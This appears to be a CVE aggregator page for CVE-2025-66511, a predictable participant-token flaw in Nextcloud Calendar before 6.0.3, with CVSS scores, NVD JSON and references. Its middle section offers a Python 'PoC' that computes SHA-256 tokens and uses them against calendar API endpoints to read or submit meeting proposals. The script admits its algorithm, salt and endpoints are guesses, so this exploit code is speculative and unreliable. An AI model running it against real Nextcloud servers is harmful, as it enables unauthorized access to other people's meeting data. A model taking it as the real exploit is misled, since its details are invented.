Security Vulnerability Report
中文
CVE-2025-66511 CVSS 4.8 MEDIUM

CVE-2025-66511

Published: 2025-12-05 17:16:05
Last Modified: 2025-12-10 16:14:27
Source: [email protected]

Description

Nextcloud Calendar is a calendar app for Nextcloud. Prior to 6.0.3, the Calendar app generates participant tokens for meeting proposals using a hash function, allowing an attacker to compute valid participant tokens, which allowed them to request details and submit dates in meeting proposals. The tokens are not purely random generated. This vulnerability is fixed in 6.0.3.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:* - VULNERABLE
Nextcloud Calendar < 6.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-66511 PoC - Nextcloud Calendar Participant Token Prediction Note: This is for educational purposes only. Do not use without authorization. """ import hashlib import requests # Configuration NEXTCLOUD_URL = "https://your-nextcloud-instance.com" MEETING_ID = "target_meeting_id" PARTICIPANT_ID = "attacker_controlled_or_known_id" def generate_participant_token(meeting_id, participant_id, salt="known_or_discovered_salt"): """ Generate participant token using the vulnerable hash function. The actual algorithm may vary - this is a demonstration. """ # This is a simplified representation of the vulnerable token generation data = f"{meeting_id}:{participant_id}:{salt}" token = hashlib.sha256(data.encode()).hexdigest()[:32] return token def exploit(): """ Exploit steps: 1. Get meeting proposal details (publicly accessible) 2. Extract meeting_id and participant information 3. Generate valid participant tokens 4. Submit date proposals using generated tokens """ # Step 1: Get meeting details meeting_url = f"{NEXTCLOUD_URL}/apps/calendar/api/v1/meetings/{MEETING_ID}" response = requests.get(meeting_url) if response.status_code == 200: meeting_data = response.json() print(f"[+] Retrieved meeting: {meeting_data.get('title')}") # Step 2: Generate tokens for each participant participants = meeting_data.get('participants', []) for participant in participants: participant_id = participant.get('id') token = generate_participant_token(MEETING_ID, participant_id) # Step 3: Use token to access details or submit dates detail_url = f"{NEXTCLOUD_URL}/apps/calendar/api/v1/meetings/{MEETING_ID}/proposal" headers = {'X-Participant-Token': token} detail_response = requests.get(detail_url, headers=headers) if detail_response.status_code == 200: print(f"[+] Successfully accessed meeting details as {participant_id}") print(f"[+] Token: {token}") if __name__ == "__main__": print("CVE-2025-66511 - Nextcloud Calendar Token Prediction") exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66511", "sourceIdentifier": "[email protected]", "published": "2025-12-05T17:16:04.797", "lastModified": "2025-12-10T16:14:27.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Calendar is a calendar app for Nextcloud. Prior to 6.0.3, the Calendar app generates participant tokens for meeting proposals using a hash function, allowing an attacker to compute valid participant tokens, which allowed them to request details and submit dates in meeting proposals. The tokens are not purely random generated. This vulnerability is fixed in 6.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-330"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "24F60C27-884F-4BF3-A50E-D189CA2DBC02"}]}]}], "references": [{"url": "https://github.com/nextcloud/calendar/commit/8de14ae87f321f5f09280d9895a27d54d24f33fb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/calendar/pull/7659", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-whm3-vv55-gf27", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3385434", "source": "[email protected]", "tags": ["Permissions Required", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.